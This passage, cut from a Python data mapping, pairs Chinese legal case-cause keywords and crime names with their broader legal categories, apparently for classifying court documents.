u'侵权责任纠纷',\r\n    u'办理偷越国(边)境人员出入境证件罪': u'渎职罪',\r\n    u'在建船舶航空器抵押权纠纷': u'担保物权纠纷',\r\n    u'破坏交通设施罪': u'危害公共安全罪',\r\n    u'餐饮': u'合同纠纷',\r\n    u'违法发放林木采伐许可证罪': u'渎职罪',\r\n    u'无民事行为能力': u'认定公民无民事行为能力、限制民事行为能力案件',\r\n    u'定期租船合同纠纷': u'海事海商纠纷',\r\n    u'非法持有毒品罪': u'妨害社会管理秩序罪',\r\n    u'窝藏、包庇罪': u'妨害社会管理秩序罪',\r\n    u'破产撤销': u'与破产有关的纠纷',\r\n    u'侵害作品修改权纠纷': u'知识产权权属侵权纠纷',\r\n    u'合资合作开发房地产合同纠纷': u'合同纠纷',\r\n    u'金融衍生品种交易纠纷': u'证券纠纷',\r\n    u'铁路运输财产损害责任纠纷': u'侵权责任纠纷',\r\n    u'仲裁程序中的证据保全': u'申请保全案件',\r\n    u'船舶损坏': u'海事海商纠纷',\r\n    u'发明创造发明人设计人署名权纠纷': u'知识产权权属侵权纠纷',\r\n    u'船员劳务': u'海事海商纠纷',\r\n    u'申请宣告公民失踪': u'宣告失踪、宣告死亡案件',\r\n    u'缔约过失': u'合同纠纷',\r\n    u'公司债权人': u'信用证纠纷',\r\n    u'有线电视': u'合同纠纷',\r\n    u'计算机软件著作权转让合同纠纷': u'知识产权合同纠纷',\r\n    u'非法使用窃听、窃照专用器材罪': u'妨害社会管理秩序罪',\r\n    u'环境污染': u'侵权责任纠纷',\r\n    u'持有伪造的发票罪': u'破坏社会主义市场经济秩序罪',\r\n    u'著作权': u'知识产权合同纠纷',\r\n    u'聚众扰乱社会秩序罪': u'妨害社会管理秩序罪',\r\n    u'土地承包经营权入股合同纠纷': u'合同纠纷',\r\n    u'紧急避险': u'侵权责任纠纷',\r\n    u'公路旅客运输': u'合同纠纷',\r\n    u'技术成果完成人': u'知识产权合同纠纷',\r\n    u'著作权权属侵权纠纷': u'知识产权权属侵权纠纷',\r\n    u'指使部属违反职责罪': u'军人违反职责罪',\r\n    u'国际货物买卖合同纠纷': u'合同纠纷',\r\n    u'委托代建合同纠纷': u'合同纠纷',\r\n    u'电子废物污染责任纠纷': u'侵权责任纠纷',\r\n    
u'展览合同纠纷': u'合同纠纷',\r\n u'信用保险合同纠纷': u'保险纠纷',\r\n u'保管纠纷': u'合同纠纷',\r\n u'互易': u'合同纠纷',\r\n u'拆迁安置': u'合同纠纷',\r\n u'证券发行失败纠纷': u'证券纠纷',\r\n u'航道': u'海事海商纠纷',\r\n u'网络侵权': u'侵权责任纠纷',\r\n u'汇票回单': u'票据纠纷',\r\n u'进出口押汇纠纷': u'合同纠纷',\r\n u'申请承认和执行': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'海难': u'海事海商纠纷',\r\n u'铁路旅客运输合同纠纷': u'合同纠纷',\r\n u'集成电路布图设计许可': u'知识产权合同纠纷',\r\n u'抗税罪': u'破坏社会主义市场经济秩序罪',\r\n u'技术转让合同纠纷': u'知识产权合同纠纷',\r\n u'侵害计算机软件著作权': u'知识产权权属侵权纠纷',\r\n u'传播性病罪': u'妨害社会管理秩序罪',\r\n u'申请承认和执行外国仲裁裁决': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'无因管理纠纷': u'知识产权权属侵权纠纷',\r\n u'职务发明创造': u'知识产权权属侵权纠纷',\r\n u'生命健康身体': u'人格权纠纷',\r\n u'对非国家工作人员行贿罪': u'破坏社会主义市场经济秩序罪',\r\n u'出卖人取回权纠纷': u'与破产有关的纠纷',\r\n u'非法利用信息网络罪': u'妨害社会管理秩序罪',\r\n u'盗窃、抢夺、毁灭国家机关公文、证件、印章罪': u'妨害社会管理秩序罪',\r\n u'申请变更监护人': u'监护权特别程序案件',\r\n u'利用未公开信息交易罪': u'破坏社会主义市场经济秩序罪',\r\n u'养殖权': u'用益物权纠纷',\r\n u'定作合同纠纷': u'合同纠纷',\r\n u'奖券': u'合同纠纷',\r\n u'债券质权纠纷': u'担保物权纠纷',\r\n u'船坞码头建造合同纠纷': u'海事海商纠纷',\r\n u'开设赌场罪': u'妨害社会管理秩序罪',\r\n u'贷款合同': u'合同纠纷',\r\n u'林木折断损害责任纠纷': u'侵权责任纠纷',\r\n u'城市公交运输': u'合同纠纷',\r\n u'外观设计专利实施': u'知识产权合同纠纷',\r\n u'健康保险': u'保险纠纷',\r\n u'保险代理': u'保险纠纷',\r\n u'侵害集成电路布图设计专有权纠纷': u'知识产权权属侵权纠纷',\r\n u'相邻通行纠纷': u'所有权纠纷',\r\n u'为亲友非法牟利罪': u'破坏社会主义市场经济秩序罪',\r\n u'申请撤销宣告': u'宣告失踪、宣告死亡案件',\r\n u'故意杀人罪': u'侵犯公民人身权利、民主权利罪',\r\n u'船舶融资租赁': u'海事海商纠纷',\r\n u'组织考试作弊罪': u'妨害社会管理秩序罪',\r\n u'侵害作品摄制权纠纷': u'知识产权权属侵权纠纷',\r\n u'侵害作品汇编权纠纷': u'知识产权权属侵权纠纷',\r\n u'网络购物合同纠纷': u'合同纠纷',\r\n u'实用新型专利实施许可合同纠纷': u'知识产权合同纠纷',\r\n u'协助组织卖淫罪': u'妨害社会管理秩序罪',\r\n u'质权': u'担保物权纠纷',\r\n u'家政服务合同纠纷': u'合同纠纷',\r\n u'海事担保合同纠纷': u'海事海商纠纷',\r\n u'金融不良债权转让': u'合同纠纷',\r\n u'劳动关系': u'劳动争议',\r\n u'票据损害责任纠纷': u'票据纠纷',\r\n u'追收': u'信用证纠纷',\r\n u'技术咨询合同纠纷': u'知识产权合同纠纷',\r\n u'侵害作品放映权纠纷': u'知识产权权属侵权纠纷',\r\n u'因申请诉前停止侵害著作权损害责任纠纷': u'知识产权权属侵权纠纷',\r\n u'同居': u'婚姻家庭纠纷',\r\n u'用工': u'劳动争议',\r\n u'保险费': u'保险纠纷',\r\n u'盗版': u'知识产权权属侵权纠纷',\r\n u'殡葬服务': u'合同纠纷',\r\n u'故意提供不合格武器装备、军事设施罪': u'危害国防利益罪',\r\n u'经纪合同': u'期货交易纠纷',\r\n u'专利权权属纠纷': u'知识产权权属侵权纠纷',\r\n u'申请宣告': u'宣告失踪、宣告死亡案件',\r\n u'中外合作勘探开发自然资源合同纠纷': u'合同纠纷',\r\n u'劳动合同纠纷': u'劳动争议',\r\n u'确认劳动关系纠纷': u'劳动争议',\r\n u'股票权利确认纠纷': u'证券纠纷',\r\n u'盗窃、抢夺武器装备、军用物资罪': u'军人违反职责罪',\r\n u'期货欺诈责任纠纷': u'期货交易纠纷',\r\n u'虐待被监管人罪': u'侵犯公民人身权利、民主权利罪',\r\n u'虚假破产罪': u'破坏社会主义市场经济秩序罪',\r\n u'债权人': u'合同纠纷',\r\n u'拒不履行信息网络安全管理义务罪': u'妨害社会管理秩序罪',\r\n u'高度危险责任纠纷': u'侵权责任纠纷',\r\n u'解散': u'信用证纠纷',\r\n u'物件': u'侵权责任纠纷',\r\n u'租赁合同': u'合同纠纷',\r\n u'证券包销合同纠纷': u'证券纠纷',\r\n u'逃税罪': u'破坏社会主义市场经济秩序罪',\r\n u'经营秘密许可使用': u'知识产权合同纠纷',\r\n u'专利使用费': u'知识产权权属侵权纠纷',\r\n u'投敌叛变罪': u'危害国家安全罪',\r\n u'申请宣告公民恢复限制民事行为能力': u'认定公民无民事行为能力、限制民事行为能力案件',\r\n u'保险人代位求偿': u'信用证纠纷',\r\n u'委托理财合同纠纷': u'合同纠纷',\r\n u'清算责任纠纷': u'与公司有关的纠纷',\r\n u'股东资格确认纠纷': u'与公司有关的纠纷',\r\n u'聚众扰乱军事管理区秩序罪': u'危害国防利益罪',\r\n u'保险诈骗罪': u'破坏社会主义市场经济秩序罪',\r\n u'承揽': u'合同纠纷',\r\n u'公正': u'侵权责任纠纷',\r\n u'仿冒': u'知识产权权属侵权纠纷',\r\n u'公司': u'信用证纠纷',\r\n u'技术培训': u'知识产权合同纠纷',\r\n u'承揽合同纠纷': u'合同纠纷',\r\n u'发明专利临时保护期': u'知识产权权属侵权纠纷',\r\n u'土地承包经营权抵押权纠纷': u'担保物权纠纷',\r\n u'专利权侵权': u'知识产权权属侵权纠纷',\r\n u'因申请诉中证据保全损害责任纠纷': u'侵权责任纠纷',\r\n u'合资': u'合同纠纷',\r\n u'产品销售者': u'侵权责任纠纷',\r\n u'私放在押人员罪': u'渎职罪',\r\n u'水上运输人身损害责任纠纷': u'侵权责任纠纷',\r\n u'阻碍解救被拐卖、绑架妇女、儿童罪': u'渎职罪',\r\n u'巨额财产来源不明罪': u'贪污贿赂罪',\r\n u'海事赔偿责任限制基金': u'海事诉讼特别程序案件',\r\n u'彩票': u'合同纠纷',\r\n u'私分罚没财物罪': u'贪污贿赂罪',\r\n u'订做': u'合同纠纷',\r\n u'申请扣押船载货物': u'海事诉讼特别程序案件',\r\n u'损害商业信誉、商品声誉罪': u'破坏社会主义市场经济秩序罪',\r\n u'恢复原状': u'物权保护纠纷',\r\n u'强迫交易罪': u'破坏社会主义市场经济秩序罪',\r\n u'供用电': u'合同纠纷',\r\n u'公司合并纠纷': u'与公司有关的纠纷',\r\n u'证券承销合同纠纷': u'证券纠纷',\r\n u'占有物': u'占有保护纠纷',\r\n u'同居关系析产纠纷': u'婚姻家庭纠纷',\r\n u'商业': 
u'不正当竞争纠纷',\r\n    u'聚众斗殴罪': u'妨害社会管理秩序罪',\r\n    u'传播': u'知识产权权属侵权纠纷',\r\n    u'电视购物合同纠纷': u'合同纠纷',\r\n    u'追偿权': u'合同纠纷',\r\n    u'健康保险合同纠纷': u'保险纠纷',\r\n    u'请求确认债务人行为无效纠纷': u'与破产有关的纠纷',\r\n    u'集体经济组织': u'所有权纠纷',\r\n    u'法定继承': u'继承纠纷',\r\n    u'装饰装修合同纠纷': u'合同纠纷',\r\n    u'殡葬服务合同纠纷': u'合同纠纷',\r\n    u'留置船': u'海事海商纠纷',\r\n    u'脱逃罪': u'妨害社会管理秩序罪',\r\n    u'特殊标志合同纠纷': u'知识产权合同纠纷',\r\n    u'非法出售用于骗取出口退税、抵扣税款发票罪': u'破坏社会主义市场经济秩序罪',\r\n    u'组织、领导传销活动罪': u'破坏社会主义市场经济秩序罪',\r\n    u'遗弃武器装备罪': u'军人违反职责罪',\r\n    u'同业拆借': u'合同纠纷',\r\n    u'故意伤害罪': u'侵犯公民人身权利、民主权利罪',\r\n    u'公司减资纠纷': u'与公司有关的纠纷',\r\n    u'期货经纪合同纠纷': u'期货交易纠纷',\r\n    u'抚养费纠纷': u'婚姻家庭纠纷',\r\n    u'船舶': u'海事海商纠纷',\r\n    u'留置权': u'担保物权纠纷',\r\n    u'著作财产': u'知识产权权属侵权纠纷',\r\n    u'拍卖': u'合同纠纷',\r\n    u'煽动军人逃离部队罪': u'危害国防利益罪',\r\n    u'录像': u'知识产权权属侵权纠纷',\r\n    u'变造货币罪': u'破坏社会主义市场经济秩序罪',\r\n    u'取回权纠纷': u'与破产有关的纠纷',\r\n    u'铁路机车': u'合同纠纷',\r\n    u'非法获取计算机信息系统数据、非法控制计算机信息系统罪': u'妨害社会管理秩序罪',\r\n    u'期货透支交易纠纷': u'期货交易纠纷',\r\n    u'牧业承包': u'合同纠纷',\r\n    u'侮辱国旗、国徽罪': u'妨害社会管理秩序罪',\r\n    u'网络域名合同': u'知识产权合同纠纷',\r\n    u'水上运输': u'侵权责任纠纷',\r\n    u'执行分配': u'执行异议之诉',\r\n    u'金融不良债权转让合同纠纷': u'合同纠纷',\r\n    u'更换': u'物权保护纠纷',\r\n    u'合并': u'信用证纠纷',\r\n    u'煽动暴力抗拒法律实施罪': u'妨害社会管理秩序罪',\r\n    u'申请诉前停止侵害著作权': u'申请诉前停止侵害知识产权案件',\r\n    u'债务转移合同纠纷': u'合同纠纷',\r\n    u'确认票据无效纠纷': u'票据纠纷',\r\n    u'种植': u'合同纠纷',\r\n    u'追索劳动报酬纠纷': u'劳动争议',\r\n    u'相邻采光日照纠纷': u'所有权纠纷',\r\n    u'擅自出卖、转让国有档案罪': u'妨害社会管理秩序罪',\r\n    u'追偿': u'信用证纠纷',\r\n    u'帮助犯罪分子逃避处罚罪': u'渎职罪',\r\n    u'铁路修建合同纠纷': u'合同纠纷',\r\n    u'仓储': u'合同纠纷',\r\n    u'战时违抗命令罪': u'军人违反职责罪',\r\n    u'破坏广播电视设施、公用电信设施罪': u'危害公共安全罪',\r\n    u'被继承人': u'继承纠纷',\r\n    u'特殊标志': u'知识产权权属侵权纠纷',\r\n    u'有奖销售纠纷': u'不正当竞争纠纷',\r\n    u'申请诉前财产保全': u'申请保全案件',\r\n    u'故意泄露军事秘密罪': u'军人违反职责罪',\r\n    u'联合运输': u'合同纠纷',\r\n    u'过失损坏电力设备罪': u'危害公共安全罪',\r\n    u'清算': u'信用证纠纷',\r\n    u'代位求偿': u'信用证纠纷',\r\n    u'证券上市合同纠纷': u'证券纠纷',\r\n    u'组织播放淫秽音像制品罪': u'妨害社会管理秩序罪',\r\n    u'铁路包裹运输合同纠纷': u'合同纠纷',\r\n    u'债券': u'信用证纠纷',\r\n    u'金融委托理财合同纠纷': u'合同纠纷',\r\n    u'产品销售者责任纠纷': u'侵权责任纠纷',\r\n    u'徇私舞弊低价折股、出售国有资产罪': u'破坏社会主义市场经济秩序罪',\r\n    u'在建建筑物抵押权纠纷': u'担保物权纠纷',\r\n    u'侵犯少数民族风俗习惯罪': u'侵犯公民人身权利、民主权利罪',\r\n    u'专利申请权转让合同纠纷': u'知识产权合同纠纷',\r\n    u'质押合同': u'合同纠纷',\r\n    u'运输合同': u'合同纠纷',\r\n    u'计算机软件开发合同纠纷': u'知识产权合同纠纷',\r\n    u'房屋转让': u'合同纠纷',\r\n    u'劳务': u'劳动争议',\r\n    u'纵向垄断协议纠纷': u'垄断纠纷',\r\n    u'定期租船': u'海事海商纠纷',\r\n    u'制作、复制、出版、贩卖、传播淫秽物品牟利罪': u'妨害社会管理秩序罪',\r\n    u'抵押权纠纷': u'担保物权纠纷',\r\n    u'聚众扰乱公共场所秩序、交通秩序罪': u'妨害社会管理秩序罪',\r\n    u'房地产开发经营合同纠纷': u'合同纠纷',\r\n    u'购房': u'合同纠纷',\r\n    u'联营合同纠纷': u'与企业有关的纠纷',\r\n    u'贪污罪': u'贪污贿赂罪',\r\n    u'生产、销售不符合卫生标准的化妆品罪': u'破坏社会主义市场经济秩序罪',\r\n    u'聚众淫乱罪': u'妨害社会管理秩序罪',\r\n    u'赡养纠纷': u'婚姻家庭纠纷',\r\n    u'擅自使用知名商品特有名称包装装潢纠纷': u'不正当竞争纠纷',\r\n    u'固体废物污染责任纠纷': u'侵权责任纠纷',\r\n    u'擅自使用他人企业名称姓名纠纷': u'不正当竞争纠纷',\r\n    u'技术转化': u'知识产权合同纠纷',\r\n    u'虚报注册资本罪': u'破坏社会主义市场经济秩序罪',\r\n    u'不服': u'行政管理与行政行为',\r\n    u'企业承包经营': u'信用证纠纷',\r\n    u'船舶碰撞': u'海事海商纠纷',\r\n    u'申请为失踪人财产指定、变更代管人': u'宣告失踪、宣告死亡案件',\r\n    u'共有物分割纠纷': u'所有权纠纷',\r\n    u'债权纠纷': u'信用证纠纷',\r\n    u'申请破产清算': u'与破产有关的纠纷',\r\n    u'法定职责': u'行政管理与行政行为',\r\n    u'强制猥亵、侮辱罪': u'侵犯公民人身权利、民主权利罪',\r\n    u'申请破产重整': u'与破产有关的纠纷',\r\n    u'演出合同纠纷': u'合同纠纷',\r\n    u'交易结算': u'证券纠纷',\r\n    u'船舶共有纠纷': u'海事海商纠纷',\r\n    u'出租汽车运输合同纠纷': u'合同纠纷',\r\n    u'拖航': u'海事海商纠纷',\r\n    u'聚众持械劫狱罪': u'妨害社会管理秩序罪',\r\n    u'表演权': u'知识产权权属侵权纠纷',\r\n    u'商标权转让': u'知识产权合同纠纷',\r\n    u'产品生产者责任纠纷': u'侵权责任纠纷',\r\n    u'冒充军人招摇撞骗罪': u'危害国防利益罪',\r\n    u'海上人身损害': u'海事海商纠纷',\r\n    u'排除妨害纠纷': u'物权保护纠纷',\r\n    u'特许经营合同纠纷': u'知识产权合同纠纷',\r\n    u'撤销认定': u'认定财产无主案件',\r\n    u'破坏电力设备罪': u'危害公共安全罪',\r\n    u'土地承包经营权抵押合同纠纷': u'合同纠纷',\r\n    u'发明专利实施许可合同纠纷': u'知识产权合同纠纷',\r\n    u'证券返还纠纷': u'证券纠纷',\r\n    u'客户交易结算资金纠纷': u'证券纠纷',\r\n    u'帮工': u'侵权责任纠纷',\r\n    u'变更公司登记': u'信用证纠纷',\r\n    u'擅自发行股票、公司、企业债券罪': 
u'破坏社会主义市场经济秩序罪',\r\n u'业主撤销权纠纷': u'所有权纠纷',\r\n u'申请海事请求保全': u'海事诉讼特别程序案件',\r\n u'企业名称(商号)转让合同纠纷': u'知识产权合同纠纷',\r\n u'留置权纠纷': u'担保物权纠纷',\r\n u'合伙协议': u'合同纠纷',\r\n u'车位': u'所有权纠纷',\r\n u'物件脱落、坠落损害责任纠纷': u'侵权责任纠纷',\r\n u'船舶营运借款合同纠纷': u'海事海商纠纷',\r\n u'探望': u'婚姻家庭纠纷',\r\n u'网络域名转让合同纠纷': u'知识产权合同纠纷',\r\n u'漂流物返': u'所有权纠纷',\r\n u'用益物权确认纠纷': u'物权保护纠纷',\r\n u'不报、谎报安全事故罪': u'危害公共安全罪',\r\n u'验收备案': u'行政管理与行政行为',\r\n u'房地产开发': u'合同纠纷',\r\n u'排除妨害': u'物权保护纠纷',\r\n u'企业兼并合同纠纷': u'与企业有关的纠纷',\r\n u'竞业限制纠纷': u'劳动争议',\r\n u'房屋安置': u'合同纠纷',\r\n u'赠与': u'合同纠纷',\r\n u'非法低价出让国有土地使用权罪': u'渎职罪',\r\n u'定作': u'合同纠纷',\r\n u'非法进行节育手术罪': u'妨害社会管理秩序罪',\r\n u'破产和解': u'与破产有关的纠纷',\r\n u'海上通海水域打捞合同纠纷': u'海事海商纠纷',\r\n u'不解救被拐卖、绑架妇女、儿童罪': u'渎职罪',\r\n u'内幕交易': u'信用证纠纷',\r\n u'保安服务合同纠纷': u'合同纠纷',\r\n u'追索劳动报酬': u'劳动争议',\r\n u'夫妻': u'婚姻家庭纠纷',\r\n u'拐卖妇女、儿童罪': u'侵犯公民人身权利、民主权利罪',\r\n u'隐私权纠纷': u'人格权纠纷',\r\n u'申请认可和执行台湾地区仲裁裁决': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'申请拍卖': u'海事诉讼特别程序案件',\r\n u'股东名册': u'信用证纠纷',\r\n u'投资咨询': u'证券纠纷',\r\n u'环境污染责任纠纷': u'侵权责任纠纷',\r\n u'署名权': u'知识产权权属侵权纠纷',\r\n u'执行异议': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'工商变更登记': u'行政管理与行政行为',\r\n u'服务合同': u'合同纠纷',\r\n u'车库': u'所有权纠纷',\r\n u'破产': u'信用证纠纷',\r\n u'信托': u'信用证纠纷',\r\n u'侵害作品改编权纠纷': u'知识产权权属侵权纠纷',\r\n u'海上货物运输': u'海事海商纠纷',\r\n u'伪造冒用产品质量标志纠纷': u'不正当竞争纠纷',\r\n u'返还土地款纠纷': u'所有权纠纷',\r\n u'海事请求保全': u'海事诉讼特别程序案件',\r\n u'劫持船只、汽车罪': u'危害公共安全罪',\r\n u'公路货物运输': u'合同纠纷',\r\n u'产品责任': u'侵权责任纠纷',\r\n u'居间合同纠纷': u'合同纠纷',\r\n u'抢劫罪': u'侵犯财产罪',\r\n u'收养': u'婚姻家庭纠纷',\r\n u'故意损毁名胜古迹罪': u'妨害社会管理秩序罪',\r\n u'证券资信评级服务合同纠纷': u'证券纠纷',\r\n u'战时拒绝军事征收、征用罪': u'危害国防利益罪',\r\n u'公司分立纠纷': u'与公司有关的纠纷',\r\n u'侵害作品展览权纠纷': u'知识产权权属侵权纠纷',\r\n u'港口': u'海事海商纠纷',\r\n u'装修': u'合同纠纷',\r\n u'破产抵销权纠纷': u'与破产有关的纠纷',\r\n u'融资租赁合同': u'合同纠纷',\r\n u'强行平仓': u'期货交易纠纷',\r\n u'埋藏物返还纠纷': u'所有权纠纷',\r\n u'著作权转让': u'知识产权合同纠纷',\r\n u'分家': u'婚姻家庭纠纷',\r\n u'抵毁': u'不正当竞争纠纷',\r\n u'违令作战消极罪': u'军人违反职责罪',\r\n u'非法收购、运输、加工、出售国家重点保护植物、国家重点保护植物制品罪': u'妨害社会管理秩序罪',\r\n u'滥用市场支配地位纠纷': u'垄断纠纷',\r\n u'农业技术服务合同纠纷': u'合同纠纷',\r\n u'价款': u'合同纠纷',\r\n u'建设用地使用权抵押权纠纷': u'担保物权纠纷',\r\n u'申请扣押': u'海事诉讼特别程序案件',\r\n u'欺诈发行股票、债券罪': u'破坏社会主义市场经济秩序罪',\r\n u'申请诉中': u'申请保全案件',\r\n u'专利权宣告无效': u'知识产权权属侵权纠纷',\r\n u'海运欺诈': u'海事海商纠纷',\r\n u'搬迁': u'合同纠纷',\r\n u'港口作业纠纷': u'海事海商纠纷',\r\n u'公路旅客运输合同纠纷': u'合同纠纷',\r\n u'拍卖合同': u'合同纠纷',\r\n u'临时用地': u'合同纠纷',\r\n u'挪用公款罪': u'贪污贿赂罪',\r\n u'船舶污染损害责任纠纷': u'海事海商纠纷',\r\n u'船舶融资租赁合同纠纷': u'海事海商纠纷',\r\n u'辞退': u'人事争议',\r\n u'农机作业服务合同纠纷': u'合同纠纷',\r\n u'农业承包合同纠纷': u'合同纠纷',\r\n u'占有物返还纠纷': u'占有保护纠纷',\r\n u'申请设立海事赔偿责任限制基金': u'海事诉讼特别程序案件',\r\n u'诉讼': u'合同纠纷',\r\n u'融资租赁合同纠纷': u'合同纠纷',\r\n u'侵害网络域名纠纷': u'知识产权权属侵权纠纷',\r\n u'放纵走私罪': u'渎职罪',\r\n u'雇用人损害': u'侵权责任纠纷',\r\n u'申请宣告公民无民事行为能力': u'认定公民无民事行为能力、限制民事行为能力案件',\r\n u'夫妻财产约定纠纷': u'婚姻家庭纠纷',\r\n u'被撤销': u'宣告失踪、宣告死亡案件',\r\n u'公司增资': u'与公司有关的纠纷',\r\n u'拒绝交易纠纷': u'垄断纠纷',\r\n u'拒不救援友邻部队罪': u'军人违反职责罪',\r\n u'计算网络': u'知识产权权属侵权纠纷',\r\n u'组织卖淫罪': u'妨害社会管理秩序罪',\r\n u'旅游合同纠纷': u'合同纠纷',\r\n u'船舶损坏空中设施水下设施损害责任纠纷': u'海事海商纠纷',\r\n u'押金': u'合同纠纷',\r\n u'计算机软件开发': u'知识产权合同纠纷',\r\n u'垫款': u'合同纠纷',\r\n u'债权人代位': u'合同纠纷',\r\n u'非法采集、供应血液、制作、供应血液制品罪': u'妨害社会管理秩序罪',\r\n u'挂靠经营合同纠纷': u'与企业有关的纠纷',\r\n u'离婚': u'婚姻家庭纠纷',\r\n u'偷越国(边)境罪': u'妨害社会管理秩序罪',\r\n u'为他人提供书号出版淫秽书刊罪': u'妨害社会管理秩序罪',\r\n u'劳务者': u'侵权责任纠纷',\r\n u'建设工程分包合同纠纷': u'合同纠纷',\r\n u'责任保险合同纠纷': u'保险纠纷',\r\n u'征收': u'行政管理与行政行为',\r\n u'期货强行平仓纠纷': u'期货交易纠纷',\r\n u'检验合同纠纷': u'合同纠纷',\r\n u'进出口代理': u'合同纠纷',\r\n u'普通破产债权确认纠纷': u'与破产有关的纠纷',\r\n u'非国家工作人员受贿罪': u'破坏社会主义市场经济秩序罪',\r\n u'非法出卖、转让武器装备罪': u'军人违反职责罪',\r\n u'使用虚假身份证件、盗用身份证件罪': u'妨害社会管理秩序罪',\r\n 
u'徇私舞弊发售发票、抵扣税款、出口退税罪': u'渎职罪',\r\n    u'航空旅客运输': u'合同纠纷',\r\n    u'提单质权纠纷': u'担保物权纠纷',\r\n    u'禁业': u'劳动争议',\r\n    u'支付令': u'督促程序案件',\r\n    u'失职造成珍贵文物损毁、流失罪': u'渎职罪',\r\n    u'票据付款请求权纠纷': u'票据纠纷',\r\n    u'不明抛掷物、坠落物损害责任纠纷': u'侵权责任纠纷',\r\n    u'洗钱罪': u'破坏社会主义市场经济秩序罪',\r\n    u'申请拍卖扣押船载货物': u'海事诉讼特别程序案件',\r\n    u'民用航空器损害责任纠纷': u'侵权责任纠纷',\r\n    u'抚养纠纷': u'婚姻家庭纠纷',\r\n    u'专利': u'知识产权合同纠纷',\r\n    u'股东名册记载纠纷': u'与公司有关的纠纷',\r\n    u'绑架罪': u'侵犯公民人身权利、民主权利罪',\r\n    u'水路货物运输合同纠纷': u'合同纠纷',\r\n    u'海事债权确权纠纷': u'海事海商纠纷',\r\n    u'损害公司利益': u'与公司有关的纠纷',\r\n    u'侵害经营秘密纠纷': u'不正当竞争纠纷',\r\n    u'认定工伤': u'行政管理与行政行为',\r\n    u'伪造、变造、转让金融机构经营许可证、批准文件罪': u'破坏社会主义市场经济秩序罪',\r\n    u'财产损失保险合同纠纷': u'保险纠纷',\r\n    u'入伙纠纷': u'合伙企业纠纷',\r\n    u'欺诈客户': u'证券纠纷',\r\n    u'代替考试罪': u'妨害社会管理秩序罪',\r\n    u'捆绑销售': u'不正当竞争纠纷',\r\n    u'申请认可和执行台湾地区法院民事判决': u'申请承认与执行法院判决、仲裁裁决案件',\r\n    u'集成电路布图设计创作': u'知识产权合同纠纷',\r\n    u'上市公司收购纠纷': u'与公司有关的纠纷',\r\n    u'购买': u'合同纠纷',\r\n    u'他人企业名称': u'不正当竞争纠纷',\r\n    u'公司关联交易损害责任纠纷': u'与公司有关的纠纷',\r\n    u'海运集装箱保管合同纠纷': u'海事海商纠纷',\r\n    u'破产撤销权纠纷': u'与破产有关的纠纷',\r\n    u'中外合作勘探': u'合同纠纷',\r\n    u'技术秘密让与合同纠纷': u'知识产权合同纠纷',\r\n    u'植物新品种': u'知识产权权属侵权纠纷',\r\n    u'技术转让': u'知识产权合同纠纷',\r\n    u'物权确认': u'物权保护纠纷',\r\n    u'差别待遇纠纷': u'垄断纠纷',\r\n    u'产品质量标志': u'知识产权权属侵权纠纷',\r\n    u'修理合同纠纷': u'合同纠纷',\r\n    u'合同诈骗罪': u'破坏社会主义市场经济秩序罪',\r\n    u'渔船承包': u'海事海商纠纷',\r\n    u'知识产权质权纠纷': u'担保物权纠纷',\r\n    u'通海水域': u'海事海商纠纷',\r\n    u'海事': u'海事海商纠纷',\r\n    u'共有': u'所有权纠纷',\r\n    u'组织未成年人进行违反治安管理活动罪': u'侵犯公民人身权利、民主权利罪',\r\n    u'虚假陈述': u'信用证纠纷',\r\n    u'附义务赠与': u'合同纠纷',\r\n    u'侵占期货交易': u'期货交易纠纷',\r\n    u'利用影响力受贿罪': u'贪污贿赂罪',\r\n    u'申请海事债权登记与受偿': u'海事诉讼特别程序案件',\r\n    u'海上通海水域货物运输合同纠纷': u'海事海商纠纷',\r\n    u'仓储合同纠纷': u'合同纠纷',\r\n    u'侵害技术秘密纠纷': u'不正当竞争纠纷',\r\n    u'劳务合同': u'合同纠纷',\r\n    u'经营秘密让与': u'知识产权合同纠纷',\r\n    u'民事信托': u'信托纠纷',\r\n    u'定做': u'合同纠纷',\r\n    u'基金回购': u'证券纠纷',\r\n    u'持有、使用假币罪': u'破坏社会主义市场经济秩序罪',\r\n    u'信用卡纠纷': u'合同纠纷',\r\n    u'乡镇企业承包经营合同纠纷': u'与企业有关的纠纷',\r\n    u'实物交割': u'期货交易纠纷',\r\n    u'邻接权许可使用合同纠纷': u'知识产权合同纠纷',\r\n    u'股利': u'信用证纠纷',\r\n    u'故意毁坏财物罪': u'侵犯财产罪',\r\n    u'申请中止支付保函项下款项': u'申请保全案件',\r\n    u'抢夺、窃取国有档案罪': u'妨害社会管理秩序罪',\r\n    u'借款': u'合同纠纷',\r\n    u'农村土地承包': u'合同纠纷',\r\n    u'票据': u'信用证纠纷',\r\n    u'申请确定选民资格': u'认定公民无民事行为能力、限制民事行为能力案件',\r\n    u'吸收客户资金不入账罪': u'破坏社会主义市场经济秩序罪',\r\n    u'扰乱无线电通讯管理秩序罪': u'妨害社会管理秩序罪',\r\n    u'监护': u'婚姻家庭纠纷',\r\n    u'大型群众性活动重大安全事故罪': u'危害公共安全罪',\r\n    u'议付': u'合同纠纷',\r\n    u'收买被拐卖的妇女、儿童罪': u'侵犯公民人身权利、民主权利罪',\r\n    u'私分国有资产罪': u'贪污贿赂罪',\r\n    u'劳动': u'劳动争议',\r\n    u'限制民事': u'认定公民无民事行为能力、限制民事行为能力案件',\r\n    u'动产质权纠纷': u'担保物权纠纷',\r\n    u'联营': u'信用证纠纷',\r\n    u'旅游合同': u'合同纠纷',\r\n    u'农村土地承包合同纠纷': u'合同纠纷',\r\n    u'雇用童工从事危重劳动罪': u'侵犯公民人身权利、民主权利罪',\r\n    u'共同海损纠纷': u'海事海商纠纷',\r\n    u'侵害计算机软件著作权纠纷': u'知识产权权属侵权纠纷',\r\n    u'销售假冒注册商标的商品罪': u'破坏社会主义市场经济秩序罪',\r\n    u'离退休人员返聘合同纠纷': u'合同纠纷',\r\n    u'医疗服务': u'合同纠纷',\r\n    u'技术委托': u'知识产权权属侵权纠纷',\r\n    u'海事强制令': u'海事诉讼特别程序案件',\r\n    u'修理重作更换纠纷': u'物权保护纠纷',\r\n    u'非法出售、提供试题、答案罪': u'妨害社会管理秩序罪',\r\n    u'隐瞒境外存款罪': u'贪污贿赂罪',\r\n    u'市场支配': u'垄断纠纷',\r\n    u'追偿权纠纷': u'合同纠纷',\r\n    u'食品监管渎职罪': u'渎职罪',\r\n    u'阻碍军人执行职务罪': u'危害国防利益罪',\r\n    u'邻接权转让合同纠纷': u'知识产权合同纠纷',\r\n    